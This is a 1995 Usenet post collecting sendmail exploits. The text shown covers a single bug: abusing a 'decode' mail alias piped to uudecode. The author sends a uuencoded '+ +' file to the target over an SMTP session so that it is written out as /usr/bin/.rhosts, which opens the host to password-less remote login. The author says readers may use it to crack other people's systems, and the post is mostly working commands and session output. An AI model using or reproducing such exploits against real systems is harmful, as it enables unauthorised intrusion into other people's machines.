Article 26952 of alt.security:
Path: nntpd.lkg.dec.com!crl.dec.com!crl.dec.com!caen!usenet.cis.ufl.edu!usenet.eel.ufl.edu!news.ultranet.com!news.sprintlink.net!dispatch.news.demon.net!demon!not-for-mail
From: postmaster@hacknet.demon.ac.uk (Postmaster)
Newsgroups: alt.security,alt.2600,alt.ph.uk,comp.security.unix,com.security.misc
Subject: Sendmail Exploits v.02b  -  mailhaq2.txt [1/1]
Date: Fri, 04 Aug 1995 19:05:11 GMT
Organization: Hacknet
Lines: 68
Message-ID: <807563111.4954@hacknet.demon.co.uk>
Reply-To: postmaster@hacknet.demon.co.uk
NNTP-Posting-Host: hacknet.demon.co.uk
X-NNTP-Posting-Host: hacknet.demon.co.uk
X-Newsreader: WinVN 0.99.5
Xref: nntpd.lkg.dec.com alt.security:26952 alt.2600:98116 comp.security.unix:18413

Heres something I threw together, I am looking for more exploits
so if you have any be sure to e-mail me them.
                        S e n d M a i l - B u g s
                        
                             E x p l o i t s
                                  Lists
                                  v.02b
                                
<By Postmaster@hacknet.demon.co.uk>

Introduction and Legal Ramble
-----------------------------

This is written for anyone thats interested in learning about the
many Security holes that are resident in many versions of Sendmail.
I do not care if you use it to protect your system against others,
or crack other ppls systems...just don't involve me in it.

I wrote it to collate all the information on sendmail into one list
for convience and perhaps it will help some people.

This paper is (c) 1995, however I do not object, to you including
any of these in a Zine (others have), FAQ, printed magazine, 
book etc... just mail me first so I known where it's distributed *:^)

Have you spotted a mistake or anything I could add? Then just add your
own stuff and put yourself down on the credits and mail it me :)

Note: This is v.02b so there is bound to be mistakes and there are alot
of other stuff to add as well....and expand it to include FTP daemon bugs?
I am extremely busy..and am only releasing it due to popular demand.

OH, all I ask is tell me what versions these work on, and if you
have other exploits then mail me them :) !

BUG 1
-----

Problem: /etc/aliases sometimes contains: decode: |/usr/bin/uudecode
Just comment it out.

% cat > outfile                  # Lets make our .rhosts file
+ +
^C
% uuencode outfile /usr/bin/.rhosts        
begin 644 /usr/bin/.rhosts           
$*R`K"@``
`
end
% telnet 127.1 25            
Trying 127.0.0.1...
Connected to 127.1.
Escape character is '^]'.
220 fred Sendmail 5.64/zippy-1.22.01 ready at Mon, 24 Jul 95 09:34:12 
-0400 (GMT)
helo                                    
250 fred Hello  (localhost), pleased to meet you     # Howz it hangin?
mail from: bin                     
250 bin... Sender ok               
rcpt to: decode                         
250 decode... Recipient ok              
data
354 Enter mail, end with "." on a line by itself
begin 644 /usr/bin/.rhosts  # just type our uuencoded + +
$*R`K"@``
`                                       
end